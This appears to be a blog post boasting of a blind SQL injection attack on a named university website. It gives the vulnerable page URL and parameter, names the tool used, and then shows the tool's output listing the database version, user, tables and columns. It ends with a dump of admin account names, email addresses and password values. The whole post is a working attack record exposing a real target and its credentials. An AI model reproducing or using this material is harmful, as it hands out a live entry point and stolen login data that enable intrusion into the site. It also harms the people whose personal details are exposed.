Website: http://www.unimedia.ac.id/
Bug: SQL injection
Tool: blindext.py
Dumps:
[+] URL:http://www.unimedia.ac.id/page.php?title=2007%2F2008&article=21
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
[+] MySQL >= v5.0.0 found!
[+] Showing database version, username@location, and database name!
[+] 10:52:25
[0]: 5.0.51-log:umn@localhost:umn
[-] 10:53:12
[-] Total URL Requests 206
[-] Done
[+] URL:http://www.unimedia.ac.id/page.php?title=2007%2F2008&article=21
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
[+] MySQL >= v5.0.0 found!
[+] Showing all databases current user has access too!
[+] 10:12:27
[+] Number of Rows: 2
[0]: test
[1]: umn
[-] 10:12:48
[-] Total URL Requests 80
[-] Done
[+] URL:http://www.unimedia.ac.id/page.php?title=2007%2F2008&article=21
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
[+] MySQL >= v5.0.0 found!
[+] Showing Tables from database "umn"
[+] 10:13:08
[+] Number of Rows: 6
[0]: article
[1]: menu
[2]: myinfo
[3]: mymedia
[4]: myuser
[5]: registrasi_baru
[-] 10:15:04
[-] Total URL Requests 379
[-] Done
[+] URL:http://www.unimedia.ac.id/page.php?title=2007%2F2008&article=21
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
[+] MySQL >= v5.0.0 found!
[+] Showing Columns from database "umn" and Table "myuser"
[+] 10:18:32
[+] Number of Rows: 10
[0]: id
[1]: name
[2]: department
[3]: address
[4]: phone
[5]: email
[6]: mypass
[7]: level
[8]: view
[9]: sdate
[-] 10:20:25
[-] Total URL Requests 467
[-] Done
[+] URL:http://www.unimedia.ac.id/page.php?title=2007%2F2008&article=21
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
[+] MySQL >= v5.0.0 found!
[+] Dumping data from database "umn" Table "myuser"
[+] Column(s) ['id', 'name', 'email', 'mypass']
[+] 10:22:11
[+] Number of Rows: 2
[0]: 1:Web Admin UMN:webadmin@unimedia.ac.id:dW1uaWN0
[1]: 3:na:admin@min.net:author
[-] 10:24:26
[-] Total URL Requests 542
[-] Done
0 comments:
Post a Comment